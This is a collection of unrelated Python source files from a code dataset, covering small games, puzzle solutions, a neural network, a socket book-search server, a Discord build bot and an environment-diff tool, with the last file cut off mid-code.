for each\n\t\toutputFile.write(line)\r\n\t\tlineElements = line.strip().split()\r\n\t\tchrom = lineElements[0]\r\n\t\tstart = int(lineElements[1])\r\n\t\tend = int(lineElements[2])\n\t\tfor jitter in JITTERLIST:\n\t\t\t# Iterate through the jitter lengths and make a new region for each\n\t\t\tearlyJitterStart = start - jitter\n\t\t\tearlyJitterEnd = end - jitter\n\t\t\tlateJitterStart = start + jitter\n\t\t\tlateJitterEnd = end + jitter\n\t\t\toutputFile.write(chrom + \"\\t\" + str(earlyJitterStart) + \"\\t\" + str(earlyJitterEnd) + \"\\n\")\r\n\t\t\toutputFile.write(chrom + \"\\t\" + str(lateJitterStart) + \"\\t\" + str(lateJitterEnd) + \"\\n\")\r\n\tbedFile.close()\r\n\toutputFile.close()\r\n\r\nif __name__==\"__main__\":\r\n\tjitterBed()\n","sub_path":"jitterBed.py","file_name":"jitterBed.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
{"seq_id":"85408602","text":"'''\nURL: https://leetcode.com/problems/build-an-array-with-stack-operations/\n\nDifficulty: Easy\n\nDescription: Build an Array With Stack Operations\n\nGiven an array target and an integer n. In each iteration, you will read a number from list = {1,2,3..., n}.\n\nBuild the target array using the following operations:\n\nPush: Read a new element from the beginning list, and push it in the array.\nPop: delete the last element of the array.\nIf the target array is already built, stop reading more elements.\nYou are guaranteed that the target array is strictly increasing, only containing numbers between 1 to n inclusive.\n\nReturn the operations to build the target array.\n\nYou are guaranteed that the answer is unique.\n\n \n\nExample 1:\n\nInput: target = [1,3], n = 3\nOutput: [\"Push\",\"Push\",\"Pop\",\"Push\"]\nExplanation: \nRead number 1 and automatically push in the array -> [1]\nRead number 2 and automatically push in the array then Pop it -> [1]\nRead number 3 and automatically push in the array -> [1,3]\nExample 2:\n\nInput: target = [1,2,3], n = 3\nOutput: [\"Push\",\"Push\",\"Push\"]\nExample 3:\n\nInput: target = [1,2], n = 4\nOutput: [\"Push\",\"Push\"]\nExplanation: You only need to read the first 2 numbers and stop.\nExample 4:\n\nInput: target = [2,3,4], n = 4\nOutput: [\"Push\",\"Pop\",\"Push\",\"Push\",\"Push\"]\n \n\nConstraints:\n\n1 <= target.length <= 100\n1 <= target[i] <= 100\n1 <= n <= 100\ntarget is strictly increasing.\n\n'''\n\n\nclass Solution:\n    def buildArray(self, target, n):\n        output = []\n        target_index = 0\n\n        for i in range(1, n+1):\n            if output == target or target_index >= len(target):\n                break\n\n            output.append(\"Push\")\n            if target[target_index] == i:\n                target_index += 1\n            else:\n                output.append(\"Pop\")\n\n        return output\n","sub_path":"1441 Build an Array With Stack Operations.py","file_name":"1441 Build an Array With Stack Operations.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"15713286","text":"# The same teacher wants to draw a random order for the students' presentations. Write a program that reads the names of the four students and shows the drawn order\n\nimport random\n\nn1 = str(input('First student\\n'))\nn2 = str(input('Second student\\n'))\nn3 = str(input('Third student\\n'))\nn4 = str(input('Fourth student\\n'))\nlista = [n1, n2, n3, n4]\nrandom.shuffle(lista)\nprint('The presentation order will be')\nprint(lista)\n","sub_path":"aula01/ex14.py","file_name":"ex14.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"575987724","text":"#PY.01.15 Project 8: Tic Tac Toe Game\r\n#Description: It is a 2 player game where X and O are the two players' symbols used to fill the board\r\n#             If one of the players fills the board in such a way that his/her symbol forms a straight line or a\r\n#             diagonal he will be the winner\r\n\r\n\r\nboard = [\" \" for i in range(1,10)] #Board with nine spaces\r\n\r\ndef printboard(): # arrangement of board\r\n    row1=\"|{}|{}|{}|\".format(board[0],board[1],board[2])\r\n    row2=\"|{}|{}|{}|\".format(board[3],board[4],board[5])\r\n    row3=\"|{}|{}|{}|\".format(board[6],board[7],board[8])\r\n\r\n    print()\r\n    print(row1)\r\n    print(row2)\r\n    print(row3)\r\n    print()\r\n\r\ndef player_move(symbol):\r\n\r\n    \r\n    print(\"your turn player{}\".format(symbol))\r\n    \r\n    choice = int(input(\"Enter your choice from (1-9): \").strip()) # Input to give the position to enter the symbol    \r\n    if board[choice-1] == \" \":\r\n        board[choice-1] = symbol\r\n    else:\r\n        print()\r\n        print(\"already filled\")  # if space is already used\r\n\r\ndef win(symbol): # checks for the sides and diagonals for the win case\r\n    if(board[0] == symbol and board[1] == symbol and board[2] == symbol)or\\\r\n      (board[3] == symbol and board[4] == symbol and board[5] == symbol)or\\\r\n      (board[6] == symbol and board[7] == symbol and board[8] == symbol)or\\\r\n      (board[0] == symbol and board[4] == symbol and board[8] == symbol)or\\\r\n      (board[2] == symbol and board[4] == symbol and board[6] == symbol)or\\\r\n      (board[0] == symbol and board[3] == symbol and board[6] == symbol)or\\\r\n      (board[1] == symbol and board[4] == symbol and board[7] == symbol)or\\\r\n      (board[2] == symbol and board[5] == symbol and board[8] == symbol):\r\n        print(\"{} wins !!!\".format(symbol))\r\n        return True\r\n    else:\r\n        return False\r\ndef draw():  #if no space is remaining and no win has happened then it is a draw\r\n    if \" \" not in board:\r\n        return True\r\n    else:\r\n        return False\r\n    \r\n    \r\n    \r\nwhile True:  # used to print the table frequently\r\n    printboard()\r\n    player_move(\"X\")  # Gives chance to X\r\n    printboard()     # prints the board with X input position\r\n    if win(\"X\"):   # checks for win\r\n        break       #If win happens the loop breaks\r\n    elif draw():    # else draw\r\n        print(\"It's a draw\")\r\n        break\r\n    player_move(\"O\")  #same as above with O\r\n    if win(\"O\"):\r\n        break\r\n    elif draw():\r\n        print(\"It's a draw\")\r\n        break\r\n    \r\n    \r\n","sub_path":"TicTacToe_Game.py","file_name":"TicTacToe_Game.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"45689904","text":"\"\"\"\nProject Euler Problem 62\n========================\n\nThe cube, 41063625 (345^3), can be permuted to produce two other cubes:\n56623104 (384^3) and 66430125 (405^3). 
In fact, 41063625 is the smallest\ncube which has exactly three permutations of its digits which are also\ncube.\n\nFind the smallest cube for which exactly five permutations of its digits\nare cube.\n\"\"\"\n\ndef numToList(n):\n    \"\"\" Takes a number and returns a sorted list. \"\"\"\n    return tuple(sorted(map(int,list(str(n)))))\n\n\"\"\"\n    Use the sorted digits of a cube as a key and store a list of numbers that\n    contain these digits.\n\"\"\"\n\ndef solve():\n    d = dict()\n    n = 1\n    while True:\n        temp = n**3\n        key = numToList(temp)\n        d.setdefault(key, []).append(temp)\n\n        if len(d[key]) == 5:\n            return min(d[key])\n        n += 1\n\nprint(solve())\n\n\n","sub_path":"euler-py/062.py","file_name":"062.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"488286119","text":"import pygame\nimport time\n\npygame.font.init()\nscreen = pygame.display.set_mode((800,600))\nbackground = (0, 0, 0)\nscreen.fill((background))\nmyfont = pygame.font.Font(None, 90)\nf = open(\"/home/les/text.txt\",\"r\")\nfor line in f:\n    for word in line.split():\n        text = myfont.render(word,1,(0,255,0))\n        screen.blit(text, (300,300))\n        pygame.display.update()\n        time.sleep(0.2)\n        screen.fill((background))\n        pygame.display.update()\npygame.display.quit()\n","sub_path":"speed-reader.py","file_name":"speed-reader.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"357270559","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Import numerics libraries\nimport numpy as np\n\n# Import required custom routines\nfrom IndividualAnalysis import individualClusterProperties, _extractNonStraddling\nfrom AverageAnalysis import averageClusterProperties\nfrom sgolay2D import sgolay2d\nfrom extractClusterCoordinates import extractClusterCoordinates\nfrom paramSpace import simParams_dict, directory_dict\n\n# Set up reference to working dir \nfrom os import chdir\nfrom os.path import join as pathJoin\nchdir(directory_dict[\"root\"])\ndataDir = directory_dict[\"data\"]\noutputDir = directory_dict[\"output\"]\n\ndef main(threshold, timeArray, firstFileId=0, lastFileId=100, stride=1):\n    T = timeArray\n    maxFileId = len(T)-1\n\n    assert (0 <= firstFileId <= maxFileId), \"(0 <= firstFileId <= maxFileId) not satisfied\"\n    assert (firstFileId <= lastFileId <= maxFileId), \"(firstFileId <= lastFileId <= maxFileId) not satisfied\"\n    assert (0.0 < threshold < 1.0), \"Threshold must be within (0,1)\"\n\n\n    #Detect initial coordinates; will be updated\n    #Output of extractClusterCoordinates() has format: [(X1, Y1, True/False), ...]\n    capacity = simParams_dict[\"capacity\"]\n    firstS = np.load( pathJoin(dataDir, \"sSplit/{}-configS_2D.dat.npy\".format(firstFileId)))\n    firstS = sgolay2d(firstS / capacity, 17, 5)\n    prevCoordinates = extractClusterCoordinates(firstS, threshold)\n\n    #Initialize output NumPy\n    #First column: time (hr);\n    #Other columns cluster: occupancy (in units of \"capacity\")\n    timeIndexObj = range(firstFileId, lastFileId, stride)\n    rOccupancy = np.zeros(shape=(len(timeIndexObj), len(prevCoordinates)+1), dtype=np.float32)\n    rOccupancy[:,-1] = T[timeIndexObj]\n    sOccupancy = np.copy(rOccupancy)\n\n    #Initialize output DataFrame for average properties\n    \n\n    ''' Main execution double loop '''\n    for timeIndex in timeIndexObj:\n        R = np.load( pathJoin(dataDir, \"rSplit/{}-configR_2D.dat.npy\".format(timeIndex)) )/capacity\n        S = np.load( pathJoin(dataDir, \"sSplit/{}-configS_2D.dat.npy\".format(timeIndex)) )/capacity\n        filtered_S = sgolay2d(S, 17, 5)\n        \n        currentCoordinates = extractClusterCoordinates(filtered_S, threshold)\n        \n        individualClusterProperties(R, S, T, timeIndex, \n                                    prevCoordinates, currentCoordinates,\n                                    rOccupancy, sOccupancy)\n        \n        averageClusterProperties(R, S, T, timeIndex, currentCoordinates)\n\n    ''' Save analysis results to file '''\n    np.save( pathJoin(outputDir, \"rOccupancy.npy\"), rOccupancy, fix_imports=False )\n    np.save( pathJoin(outputDir, \"sOccupancy.npy\"), sOccupancy, fix_imports=False )\n    return (rOccupancy, sOccupancy)\n\nif __name__ == \"__main__\":    \n    T = np.loadtxt(pathJoin(dataDir,\"raw/time_2D.dat\"), dtype=np.float32)\n    T = T/3600    \n    r,s = main(threshold=0.1, timeArray=T, firstFileId=0, lastFileId=9, stride=1)","sub_path":"src/singleClusterTrack/singleClusterFluctuations.py","file_name":"singleClusterFluctuations.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
{"seq_id":"168805212","text":"import random\n\nimport numpy as np\n\n\ndef sigmoid(x):\n    return 1 / (1 + np.exp(-x))\n\n\ndef deriv_sigmoid(x):\n    fx = sigmoid(x)\n    return fx * (1 - fx)\n\n\ndef mse_loss(y_true, y_pred):\n    return ((y_true - y_pred) ** 2).mean()\n\n\nclass Neuron:\n    def __init__(self, weights, bias):\n        self.weights = weights\n        self.bias = bias\n\n    def feedforward(self, inputs):\n        total = np.dot(self.weights, inputs) + self.bias\n        return sigmoid(total)\n\n\nclass NeuralNetwork:\n\n    def __init__(self):\n        self.weights = np.random.normal(0, 1, 12)\n        self.bias = np.random.normal(0, 1, 3)\n\n    def func1(self, x):\n        return self.weights[0] * x[0] + self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + \\\n               self.weights[4] * x[4] + self.bias[0]\n\n    def func2(self, x):\n        return self.weights[5] * x[0] + self.weights[6] * x[1] + self.weights[7] * x[2] + self.weights[8] * x[3] + \\\n               self.weights[9] * x[4] + self.bias[1]\n\n    def feedforward(self, x):\n        h1 = sigmoid(self.func1(x))\n        h2 = sigmoid(self.func2(x))\n        o1 = sigmoid(self.weights[10] * h1 + self.weights[11] * h2 + self.bias[2])\n        return o1\n\n    def train(self, data, all_y_trues):\n\n        learn_rate = 0.1\n        epochs = 1000\n\n        for epoch in range(epochs):\n            for x, y_true in zip(data, all_y_trues):\n                sum_h1 = self.func1(x)\n                h1 = sigmoid(sum_h1)\n\n                sum_h2 = self.func2(x)\n                h2 = sigmoid(sum_h2)\n\n                sum_o1 = self.weights[10] * h1 + self.weights[11] * h2 + self.bias[2]\n                o1 = sigmoid(sum_o1)\n                y_pred = o1\n\n                d_L_d_ypred = -2 * (y_true - y_pred)\n\n                d_ypred_d_w5 = h1 * deriv_sigmoid(sum_o1)\n                d_ypred_d_w6 = h2 * deriv_sigmoid(sum_o1)\n                d_ypred_d_b3 = deriv_sigmoid(sum_o1)\n\n                # h1 and h2 reach o1 through the output-layer weights, i.e. weights[10] and weights[11]\n                d_ypred_d_h1 = self.weights[10] * deriv_sigmoid(sum_o1)\n                d_ypred_d_h2 = self.weights[11] * deriv_sigmoid(sum_o1)\n\n                d_h1_d_w1 = x[0] * deriv_sigmoid(sum_h1)\n                d_h1_d_w2 = x[1] * deriv_sigmoid(sum_h1)\n                d_h1_d_w3 = x[2] * deriv_sigmoid(sum_h1)\n                d_h1_d_w4 = x[3] * deriv_sigmoid(sum_h1)\n                d_h1_d_w5 = x[4] * deriv_sigmoid(sum_h1)\n                d_h1_d_b1 = deriv_sigmoid(sum_h1)\n\n                d_h2_d_w6 = x[0] * deriv_sigmoid(sum_h2)\n                d_h2_d_w7 = x[1] * deriv_sigmoid(sum_h2)\n                d_h2_d_w8 = x[2] * deriv_sigmoid(sum_h2)\n                d_h2_d_w9 = x[3] * deriv_sigmoid(sum_h2)\n                d_h2_d_w10 = x[4] * deriv_sigmoid(sum_h2)\n                d_h2_d_b2 = deriv_sigmoid(sum_h2)\n\n                self.weights[0] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * d_h1_d_w1\n                self.weights[1] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * d_h1_d_w2\n                self.weights[2] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * 
d_h1_d_w3\n self.weights[3] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * d_h1_d_w4\n self.weights[4] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * d_h1_d_w5\n self.bias[0] -= learn_rate * d_L_d_ypred * d_ypred_d_h1 * d_h1_d_b1\n\n self.weights[5] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_w6\n self.weights[6] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_w7\n self.weights[7] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_w8\n self.weights[8] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_w9\n self.weights[9] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_w10\n self.bias[1] -= learn_rate * d_L_d_ypred * d_ypred_d_h2 * d_h2_d_b2\n\n self.weights[10] -= learn_rate * d_L_d_ypred * d_ypred_d_w5\n self.weights[11] -= learn_rate * d_L_d_ypred * d_ypred_d_w6\n self.bias[2] -= learn_rate * d_L_d_ypred * d_ypred_d_b3\n\n if epoch % 10 == 0:\n y_preds = np.apply_along_axis(self.feedforward, 1, data)\n loss = mse_loss(all_y_trues, y_preds)\n print(\"Epoch %d loss: %.3f\" % (epoch, loss))\n\n\ndef average(d_list):\n result = 0\n for t in d_list:\n result += t\n if len(d_list) > 0:\n result /= len(d_list)\n return result\n\n\nnetwork = NeuralNetwork()\n\n\ndef calc(q_list):\n global network\n return network.feedforward(np.asarray(q_list))\n\n\ndef run():\n global network\n data = []\n y_trues = []\n for i in range(0, 50):\n data.append([])\n for j in range(0, 5):\n data[i].append(random.uniform(-1, 1))\n y_trues.append(average(data[i]))\n\n network.train(np.asarray(data), np.asarray(y_trues))\n","sub_path":"neuron.py","file_name":"neuron.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"503085178","text":"from socket import *\nfrom tkinter import *\nfrom tkinter import messagebox\nimport threading\nfrom Hoster.M_DBOp.M_DBOperation import M_DBOperation\nimport time\nclass TcpHoster(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.flag = True\n self.host = '192.168.43.125'\n self.port = 4700\n self.buf = 1024\n self.addr = (self.host, self.port)\n\n\n def run(self):\n s = socket(AF_INET, SOCK_STREAM, 0)\n s.bind(self.addr)\n s.listen(5)\n\n while(True): #用于强迫 发生错误之后,重新进入等待连接状态\n try:\n while self.flag is not False:\n print('等待连接...\\r\\n')\n cs, caddr = s.accept()\n\n if self.flag is False:\n cs.close()\n print('...服务器停止\\r\\n')\n break\n if caddr is not self.host:\n print('...连接来自于:', caddr)\n data = '欢迎你的到来!\\r\\n'\n cs.sendall(bytes(data, 'utf-8'))\n\n recKeyWords = []\n while True:\n data = cs.recv(self.buf).decode('utf-8')\n print(data)\n if data == '==':\n break\n recKeyWords.append(data)\n print(recKeyWords)\n\n searchRec = ''\n if recKeyWords[0] == '1': #主页查书\n searchWords = recKeyWords[1:]\n searchRec = M_DBOperation(searchWords)\n\n if searchRec.selectBook():\n for singleLine in searchRec.selectBook():\n print(singleLine)\n singleLineChangeToStr = ','.join([str(i) for i in singleLine])\n print(singleLineChangeToStr)\n cs.sendall(bytes(singleLineChangeToStr,'utf-8'))\n time.sleep(0.1)\n\n time.sleep(0.1)\n cs.sendall(bytes('==', 'utf-8'))\n cs.close()\n break\n except Exception as e:\n messagebox.showerror('ERROR','Something bad happen\\nTcp Server is restarting')\n\n\n def stopThread(self):\n self.flag = False\n return\n\nclass hosterCtrl(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.hoster = None\n\n self.root = Tk()\n self.root.geometry('400x200')\n self.root.geometry('+500+200')\n 
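# Fixed-size control window: resizable(0, 0) below disables horizontal and vertical resizing.\n        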
self.root.resizable(0,0)\n\n labelBlank1 = Label(self.root)\n labelBlank1.pack(side = TOP)\n\n buttonStartThread = Button(self.root,text = 'START HOSTER',font = 'Consoles',command = self.startHoster)\n buttonStartThread.pack(side = TOP)\n\n labelBlank2 = Label(self.root)\n labelBlank2.pack(side = TOP)\n\n buttonEndThread = Button(self.root ,text = 'END HOSTER',font = 'Consoles',command = self.stopHoster)\n buttonEndThread.pack(side = TOP)\n\n labelBlank3 = Label(self.root)\n labelBlank3.pack(side = TOP)\n\n buttonCloseSystem = Button(self.root,text = 'END THIS SYSTEM',font = 'Consoles',command = self.closeSystem)\n buttonCloseSystem.pack(side = TOP)\n\n mainloop()\n\n def startHoster(self):\n if self.hoster is not None:\n messagebox.showwarning('tip', 'Hoster is already start')\n else:\n self.hoster = TcpHoster()\n self.hoster.start()\n messagebox.showinfo('tip', 'Hoster is start')\n\n def stopHoster(self):\n if self.hoster is None:\n messagebox.showwarning('tip', 'Hoster is already stop')\n\n else:\n self.hoster.stopThread()\n addr = (self.hoster.host, self.hoster.port)\n cs = socket(AF_INET, SOCK_STREAM, 0)\n cs.connect(addr)\n self.hoster = None\n messagebox.showinfo('tip', 'Hoster is stop')\n\n def closeSystem(self):\n if self.hoster is not None:\n messagebox.showwarning('tip', 'Hoster is not stop')\n else:\n messagebox.showinfo('tip', 'System will close soon')\n self.root.destroy()\n\nT_hosterCtrl = hosterCtrl()\nT_hosterCtrl.start()","sub_path":"组件/陈立达/Hoster/TCP-Hoster/hoster.py","file_name":"hoster.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"196492763","text":"import nextcord\nimport time\nimport os\nimport shutil\nfrom Auth.auth import disToken\nfrom make import RemoveMode1, RemoveMode2, Clear, getUSTVGO, replaceUStVicons, updateEPG, tar, MakeCS, MakeEng, MakeMain, Git, pushbulletMode\n\nTOKEN = disToken\n\ndef remPYC():\n if os.path.exists(\"Auth/__pycache__\"):\n shutil.rmtree(\"Auth/__pycache__\")\n\n if os.path.exists(\"Assets/python/__pycache__\"):\n shutil.rmtree(\"Assets/python/__pycache__\")\n\n if os.path.exists(\"Assets/USTVGO/scripts/__pycache__\"):\n shutil.rmtree(\"Assets/USTVGO/scripts/__pycache__\")\n\n if os.path.exists(\"EPG/Generator/__pycache__\"):\n shutil.rmtree(\"EPG/Generator/__pycache__\")\n\n if os.path.exists(\"__pycache__\"):\n shutil.rmtree(\"__pycache__\")\n\ndef Mode1(): \n RemoveMode1()\n getUSTVGO()\n replaceUStVicons()\n updateEPG()\n tar()\n MakeCS()\n MakeEng()\n MakeMain()\n time.sleep(10)\n Git()\n pushbulletMode(1)\n remPYC()\n \ndef Mode2():\n RemoveMode2()\n getUSTVGO()\n replaceUStVicons()\n MakeCS()\n MakeEng()\n MakeMain()\n Git()\n pushbulletMode(2)\n\ndef Mode3():\n Git()\n pushbulletMode(3)\n remPYC()\n\n\nprefix = \"!\"\n\nclass MyClient(nextcord.Client):\n async def on_ready(self):\n Clear()\n print('------')\n print(f'Logged in as {self.user} (ID: {self.user.id})')\n print('------')\n\n async def on_message(self, message):\n if message.author.id == self.user.id:\n return\n\n if message.content.startswith(prefix + 'mode1'):\n await message.reply('OK!')\n print(f\"Running Mode 1:\")\n Mode1()\n await message.reply(\"Done! - with EPG!\")\n\n if message.content.startswith(prefix + 'mode2'):\n await message.reply('OK!')\n print(f\"Running Mode 2:\")\n Mode2()\n await message.reply(\"Done! 
- without EPG!\")\n\n        if message.content.startswith(prefix + 'mode3'):\n            await message.reply('OK!')\n            print(f\"Running Mode 3:\")\n            Mode3()\n            await message.reply(\"Done! - Just Pushed Into Repo!\")\n\n        if message.content.startswith(prefix + 'cls'):\n            print(f\"Clearing console:\")\n            Clear()\n            await message.reply(\"Done! - Console is now fresh and clean!\")\n\n        if message.content.startswith(prefix + 'rempyc'):\n            print(f\"Removing Pyc:\")\n            remPYC()\n            await message.reply(\"Done! - Removed __pycache__ folders!\")\n\n\n        if message.content.startswith('!help'):\n            print(f\"Showing help message:\")\n            embedVar = nextcord.Embed(\n                title=\"Help:\", description=\"It looks like u need help :flushed:\", color=0x336EFF\n            )\n            embedVar.add_field(name=\"Run Mode 1\", value=\"!mode1\", inline=False)\n            embedVar.add_field(name=\"Run Mode 2\", value=\"!mode2\", inline=False)\n            embedVar.add_field(name=\"Run Mode 3\", value=\"!mode3\", inline=False)\n            embedVar.add_field(name=\"Clear Console\", value=\"!cls\", inline=False)\n            embedVar.add_field(name=\"remove __pycache__\", value=\"!rempyc\", inline=False)\n            embedVar.add_field(name=\"Help\", value=\"!help\", inline=False)\n            await message.channel.send(embed=embedVar)\n\nclient = MyClient()\nclient.run(TOKEN)\n","sub_path":"discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
{"seq_id":"5730716","text":"import diskload\nimport math\nimport random\n\nuncompensated = diskload.Compensation.UNCOMPENSATED\nlove = diskload.love_numbers.read()\nlove = diskload.love_numbers.extrapolate( love, 4000000 )\n\nN = 1000\nw = 1.0\n\nalpha = 0.1\nmin_theta = alpha * 0.99\nmax_theta = alpha * 1.01\n\nbase = math.exp( math.log( max_theta / min_theta ) / (N-1) )\n\nf = open(\"data.csv\", \"w\")\n\nf.write(\"alpha theta 
alpha/theta U4K V4K G4K U40K V40K G40K U V G U400K V400K G400K U4M V4M G4M\\n\" )\n \nfor i in range(N):\n theta = (base ** i) * min_theta\n\n f.write(\"%e %e %e \" % (alpha, theta, theta/alpha) )\n \n f.write(\"%e %e %e \" % diskload.truncated( alpha, uncompensated, theta, w, 4000, love ) )\n f.write(\"%e %e %e \" % diskload.truncated( alpha, uncompensated, theta, w, 40000, love ) )\n f.write(\"%e %e %e \" % diskload.elliptic( alpha, uncompensated, theta, w, 40000, love ) )\n f.write(\"%e %e %e \" % diskload.truncated( alpha, uncompensated, theta, w, 400000, love ) )\n f.write(\"%e %e %e \" % diskload.truncated( alpha, uncompensated, theta, w, 4000000, love ) ) \n f.write(\"\\n\")\n","sub_path":"python/examples/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"522763480","text":"from mongokat import Document, Collection\n\n\nclass ShortNamesDocument(Document):\n \"\"\" This Document subclass supports limited alias names, as suggested in https://github.com/pricingassistant/mongokat/issues/13\n\n Note that they don't work in queries, field name lists, or dict(doc). Further subclassing would be necessary\n for that to work. Pull Requests welcome, though we won't include that in MongoKat itself.\n \"\"\"\n\n short_names = {\n \"description\": \"d\",\n \"value\": \"v\"\n }\n\n def __getitem__(self, key):\n if key in self.short_names:\n return self.get(self.short_names[key])\n return self.get(key)\n\n def __setitem__(self, key, value):\n if key in self.short_names:\n key = self.short_names[key]\n dict.__setitem__(self, key, value)\n\n\nclass ShortNamesCollection(Collection):\n document_class = ShortNamesDocument\n\n\ndef test_shortnames(db):\n db.test_shortnames.drop()\n SN = ShortNamesCollection(collection=db.test_shortnames)\n\n doc = SN({\"regular\": \"1\"})\n doc.save()\n\n docs = list(SN.find())\n print(docs)\n assert len(docs) == 1\n assert docs[0][\"regular\"] == \"1\"\n\n docs[0][\"value\"] = \"2\"\n docs[0].save()\n\n docs = list(SN.find())\n print(docs)\n print(dict(docs[0]))\n assert len(docs) == 1\n assert docs[0][\"value\"] == \"2\"\n assert docs[0][\"v\"] == \"2\"\n\n # Bypass mongokat to see the real document\n raw_docs = list(db.test_shortnames.find())\n assert len(raw_docs) == 1\n assert \"value\" not in raw_docs[0]\n assert raw_docs[0][\"v\"] == \"2\"\n","sub_path":"tests/test_shortnames.py","file_name":"test_shortnames.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"344811139","text":"\nfrom pathdiff import path_diff\nimport json\nimport textwrap\nimport envtool\nimport sys\nimport subprocess\n\ndef get_effect(env_before, env_after):\n ''' Outputs shell code representing the difference\n between the two environments.\n\n Ideally, 'envdiff --shell SHELL COMMAND' will produce\n code for SHELL exporting new variables, unsetting deleted\n variables and modifying new variables.\n '''\n new_vars = set(env_after.env) - set(env_before.env)\n deleted_vars = set(env_before.env) - set(env_after.env)\n common_vars = set(env_before.env).intersection(set(env_after.env))\n\n report = []\n report.append('# \\033[1;32m========== New variables ===========\\033[0m')\n for var in sorted(new_vars):\n report.append(env_after.get_declaration(var))\n\n report.append('# \\033[1;31m========== Deleted variables =======\\033[0m')\n for var in sorted(deleted_vars):\n 
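# get_unsetting(var) is expected to render shell code that removes the variable\n        # (roughly an 'unset VAR' statement in whatever syntax the target shell uses).\n        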
report.append(env_before.get_unsetting(var))\n\n report.append('# \\033[1;32m========= Changed Vars =============\\033[0m')\n for var in sorted(common_vars):\n before = env_before.env[var]\n after = env_after.env[var]\n if before != after:\n report.append(env_before.get_change(var, before, after))\n return '\\n'.join(report)\n\n\ndef compare_envs(env_before, env_after):\n ''' Return a string giving a report of the differences between the two\n environment objects '''\n new_vars = set(env_after.env) - set(env_before.env)\n deleted_vars = set(env_before.env) - set(env_after.env)\n common_vars = set(env_before.env).intersection(set(env_after.env))\n modified_vars = []\n unchanged_vars = []\n for var in sorted(common_vars):\n before = env_before.env[var]\n after = env_after.env[var]\n if before == after:\n unchanged_vars.append(var)\n else:\n modified_vars.append(var)\n\n report = []\n\n report.append('# \\033[1;34m========== unchanged variables ===========\\033[0m')\n for var in sorted(unchanged_vars):\n before = env_before.env[var]\n after = env_after.env[var]\n report.append(env_after.get_pretty_str(var))\n\n report.append('# \\033[1;32m========== New variables ===========\\033[0m')\n for var in sorted(new_vars):\n report.append(env_after.get_pretty_str(var))\n\n report.append('# \\033[1;31m========== Deleted variables =======\\033[0m')\n for var in sorted(deleted_vars):\n report.append(env_before.get_pretty_str(var))\n\n report.append('# \\033[1;33m========= Changed Vars =============\\033[0m')\n for var in sorted(modified_vars):\n before = env_before.env[var]\n after = env_after.env[var]\n if var in envtool.comparers:\n result = envtool.comparers[var](before, after)\n if result != '':\n report.append(var + '\\n' + result)\n else:\n report.append(textwrap.dedent(f'''\n {var}\n BEFORE: {env_before.get_str(var)}\n AFTER: {env_after.get_str(var)}\n ''').strip()\n )\n\n return '\\n'.join(report)\n\n\ndef env_diff(command):\n # We could get this envrionment by just doing\n # env_before = envtool.EnvWrapper.from_environment_dict()\n # but we do both the same way so that things like SHLVL will match up\n # in both\n before_script = f'''\n {sys.executable} -c 'import json, os ; print(json.dumps(dict(os.environ)))'\n '''\n result = subprocess.run(before_script, shell=True, universal_newlines=True, stdout=subprocess.PIPE, check=True)\n env_before = envtool.EnvWrapper.from_environment_dict(json.loads(result.stdout))\n\n after_script = f'''\n eval {command} 1>&2\n echo \"Command {command} complete\" >&2\n {sys.executable} -c 'import json, os ; print(json.dumps(dict(os.environ)))'\n # Redirect 1 to 2 in case the command has set up traps that may print to stdout\n exec 1>&2\n '''\n\n result = subprocess.run([\"/bin/bash\", \"-c\", after_script], universal_newlines=True, stdout=subprocess.PIPE)\n #\n # NOTE: From cypthon:Lib/subprocess.py:1710, setting shell=True and passing\n # a string for args causes the string args to be passed to 'sh -c' and it\n # seems that `sh -c` stops when a syntax error is encountered in a sourced\n # file.\n #\n # after_script = '''\n # source a_file_that_contains_syntax_error.sh\n # echo 'end'\n # '''\n #\n # I.E. we don't see the 'end' being printed. If after_script was a file,\n # and we sourced that file in an interactive /bin/sh, then we do see the\n # 'end' string being printed.\n #\n # With BASH, the behavior is the same in interactive or with 'bash -c' we\n # see the 'end' being printed. 
